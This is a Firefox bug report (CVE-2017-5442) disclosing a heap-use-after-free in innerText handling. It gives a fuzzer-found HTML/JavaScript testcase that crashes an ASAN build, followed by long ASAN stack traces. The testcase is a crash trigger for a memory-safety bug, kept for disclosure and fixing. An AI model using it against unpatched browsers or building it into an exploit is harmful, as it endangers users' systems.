Bug 1347979 (CVE-2017-5442)

heap-use-after-free in GetRequiredInnerTextLineBreakCount

RESOLVED FIXED in Firefox -esr45

Status

()

--
critical
RESOLVED FIXED
2 years ago
a year ago

People

(Reporter: nils, Assigned: mats)

Tracking

(4 keywords)

Trunk
mozilla55
crash, csectype-uaf, sec-high, testcase
Points:
---
Bug Flags:
sec-bounty +
in-testsuite ?
qe-verify -

Firefox Tracking Flags

(firefox-esr4553+ fixed, firefox52 wontfix, firefox-esr5253+ fixed, firefox53+ fixed, firefox54+ fixed, firefox55+ fixed)

Details

(Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+])

Attachments

(2 attachments)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170316115330)

<script>
function start() {
	o0=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o0.src="data:text/html,<div><div><div>";
	o0.addEventListener('load', fun0,false);
	document.body.appendChild(o0);
	o2=window.document.documentElement;
}
function fun0() {
	o4=o0.contentDocument;
	tmp=o4.getElementsByTagName('*');
	o5=tmp[0];
	o7=tmp[4];
	o0.contentWindow.onresize=fun1;
	o0.width='-4px';
	o7.innerHTML='<rp><style>*{ display: ruby-text-container;</style> a';
	o5.innerText;
}
function fun1() {
	o2.textContent='undefined';
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==7691==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250003cb680 at pc 0x7f3175181423 bp 0x7ffeb6ea8e30 sp 0x7ffeb6ea8e28
READ of size 8 at 0x6250003cb680 thread T0 (Web Content)
    #0 0x7f3175181422 in GetContent /home/worker/workspace/build/src/obj-firefox/dist/include/nsIFrame.h:676:43
    #1 0x7f3175181422 in GetRequiredInnerTextLineBreakCount /home/worker/workspace/build/src/dom/base/nsRange.cpp:3487
    #2 0x7f3175181422 in nsRange::GetInnerTextNoFlush(mozilla::dom::DOMString&, mozilla::ErrorResult&, nsIContent*, unsigned int, nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:3588
    #3 0x7f317709e5eb in nsGenericHTMLElement::GetInnerText(mozilla::dom::DOMString&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:2984:3
    #4 0x7f31765e67fb in mozilla::dom::HTMLElementBinding::get_innerText(JSContext*, JS::Handle<JSObject*>, nsGenericHTMLElement*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:250:9
    #5 0x7f31768d089c in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2843:13
    #6 0x7f317c05c361 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #7 0x7f317c05c361 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #8 0x7f317c05d97f in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #9 0x7f317c05d97f in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #10 0x7f317c05d97f in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #11 0x7f317cedc605 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #12 0x7f317cedc605 in GetExistingProperty<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #13 0x7f317cedc605 in NativeGetPropertyInline<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #14 0x7f317cedc605 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #15 0x7f317cc5bd4d in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #16 0x7f317cc5bd4d in js::Wrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:143
    #17 0x7f317cc10865 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
    #18 0x7f317cc39510 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:325:21
    #19 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1441:16
    #20 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #21 0x7f317c064c0b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #22 0x7f317c048281 in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #23 0x7f317c048281 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2671
    #24 0x7f317c02b5ce in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #25 0x7f317c05c4e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #26 0x7f317c05ccf2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #27 0x7f317c9cfecb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #28 0x7f317637a017 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #29 0x7f3176ca5c88 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #30 0x7f3176ca5c88 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #31 0x7f3176ca7aaa in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #32 0x7f3176c930e1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
    #33 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #34 0x7f3174ced50d in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3815:7
    #35 0x7f3176c931d7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:12
    #36 0x7f3176c931d7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468
    #37 0x7f3176c9375c in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
    #38 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #39 0x7f3178dc91ec in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #40 0x7f317b1502d9 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
    #41 0x7f317b14c538 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #42 0x7f317b15368f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #43 0x7f3174063729 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #44 0x7f31740626dc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
    #45 0x7f317405f578 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #46 0x7f31740613f2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #47 0x7f317406211c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #48 0x7f3172832352 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:28
    #49 0x7f3175038b6b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8858:18
    #50 0x7f317503873c in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8784:9
    #51 0x7f317500f6ed in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5289:3
    #52 0x7f31750d8ce2 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #53 0x7f31750d8ce2 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #54 0x7f31750d8ce2 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #55 0x7f317264ba61 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #56 0x7f317267f34c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #57 0x7f317267bc78 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #58 0x7f3173423de1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #59 0x7f3173384940 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #60 0x7f3173384940 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #61 0x7f3173384940 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #62 0x7f31785e89af in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #63 0x7f317bc11f07 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:22
    #64 0x7f3173384940 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #65 0x7f3173384940 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #66 0x7f3173384940 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #67 0x7f317bc11926 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:34
    #68 0x4eb4b3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #69 0x4eb4b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #70 0x7f318da7b82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #71 0x41ce08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ce08)

0x6250003cb680 is located 5504 bytes inside of 8192-byte region [0x6250003ca100,0x6250003cc100)
freed by thread T0 (Web Content) here:
    #0 0x4bb33b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f318ad52347 in FreeArenaList /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:195:9
    #2 0x7f318ad52347 in PL_FinishArenaPool /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:222
    #3 0x7f3178c5f00c in nsPresArena::~nsPresArena() /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:56:3
    #4 0x7f3178cd689b in nsIPresShell::~nsIPresShell() /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:182:7
    #5 0x7f3178cd6a3d in mozilla::PresShell::~PresShell() /home/worker/workspace/build/src/layout/base/PresShell.cpp:899:1
    #6 0x7f3178cd2314 in mozilla::PresShell::Release() /home/worker/workspace/build/src/layout/base/PresShell.cpp:893:1
    #7 0x7f3178adb884 in ~nsCOMPtr_base /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:294:7
    #8 0x7f3178adb884 in nsComputedDOMStyle::GetStyleContextForElement(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:451
    #9 0x7f317517fe0f in ElementIsVisible /home/worker/workspace/build/src/dom/base/nsRange.cpp:3454:31
    #10 0x7f317517fe0f in nsRange::GetInnerTextNoFlush(mozilla::dom::DOMString&, mozilla::ErrorResult&, nsIContent*, unsigned int, nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:3583
    #11 0x7f317709e5eb in nsGenericHTMLElement::GetInnerText(mozilla::dom::DOMString&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:2984:3
    #12 0x7f31765e67fb in mozilla::dom::HTMLElementBinding::get_innerText(JSContext*, JS::Handle<JSObject*>, nsGenericHTMLElement*, JSJitGetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:250:9
    #13 0x7f31768d089c in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2843:13
    #14 0x7f317c05c361 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #15 0x7f317c05c361 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #16 0x7f317c05d97f in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #17 0x7f317c05d97f in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #18 0x7f317c05d97f in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #19 0x7f317cedc605 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #20 0x7f317cedc605 in GetExistingProperty<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #21 0x7f317cedc605 in NativeGetPropertyInline<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #22 0x7f317cedc605 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #23 0x7f317cc5bd4d in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #24 0x7f317cc5bd4d in js::Wrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:143
    #25 0x7f317cc10865 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
    #26 0x7f317cc39510 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:325:21
    #27 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1441:16
    #28 0x7f317c064c0b in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #29 0x7f317c064c0b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #30 0x7f317c048281 in GetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:192:12
    #31 0x7f317c048281 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2671
    #32 0x7f317c02b5ce in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #33 0x7f317c05c4e6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #34 0x7f317c05ccf2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #35 0x7f317c9cfecb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #36 0x7f317637a017 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #37 0x7f3176ca5c88 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #38 0x7f3176ca5c88 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1120
    #39 0x7f3176ca7aaa in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #40 0x7f3176c930e1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
    #41 0x7f3176c96632 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #42 0x7f3174ced50d in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3815:7
    #43 0x7f3176c931d7 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:12
    #44 0x7f3176c931d7 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb68c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f318ad51c54 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7f3178c5f84b in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7f3178bda31f in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7f3178bda31f in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:240
    #5 0x7f3178bda31f in operator new /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1400
    #6 0x7f3178bda31f in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1429
    #7 0x7f3178be9ee4 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:946:14
    #8 0x7f3178beeb01 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1400:10
    #9 0x7f3178bee5a0 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1410:10
    #10 0x7f3178d83598 in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:136:12
    #11 0x7f3178d83598 in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:94
    #12 0x7f3178d83598 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*, mozilla::dom::Element*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5066
    #13 0x7f3178d868b2 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5031:10
    #14 0x7f3178d868b2 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5047
    #15 0x7f3178d868b2 in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&, nsCSSFrameConstructor::FrameConstructionItemList&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5685
    #16 0x7f3178d69fd1 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11046:9
    #17 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #18 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #19 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #20 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #21 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #22 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #23 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #24 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #25 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #26 0x7f3178d6a4d6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
    #27 0x7f3178d7e759 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #28 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #29 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #30 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #31 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #32 0x7f3178d7ea46 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
    #33 0x7f3178d7ea46 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4075
    #34 0x7f3178d8922f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
    #35 0x7f3178d6a4d6 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
